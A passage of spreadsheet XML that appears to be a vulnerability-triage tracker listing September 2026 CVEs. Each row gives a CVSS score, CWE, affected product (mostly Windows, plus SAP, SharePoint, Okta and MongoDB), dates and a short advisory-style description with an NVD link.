      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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4" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83980</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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5" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83981</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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6" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83982</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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7" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83983</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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8" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83985</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K21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19" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83986</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22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20" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83987</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22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21" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22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22" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K223" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83995</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22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24" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22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25" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66767</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Application Server for ABAP and ABAP Platform allows an unauthenticated user to send a specially crafted packet that triggers reprocessing of a previously buffered user request, potentially hijacking another user's session under narrow timing conditions. Successful exploitation could result in high impact on confidentiality and integrity, with low impact on availability of the application.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69683</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K227" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78623</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize SAML assertion values before interpolating them into database queries in the advanced mode datastore configuration. The unsanitized values are substituted directly into the query string prior to preparation, resulting in unintended SQL execution against the configured backend database.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K229" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's LDAP authorization integration where pooled LDAP connections can retain stale authentication identities after user authentication under certain configurations. Subsequent authorization queries may execute under an unintended LDAP identity rather than the expected one. This can result in incorrect role assignments based on the LDAP directory's access control configuration, potentially allowing an authenticated user to acquire elevated privileges that were not intended by the deployment's authorization policy.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62759</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K23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0" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
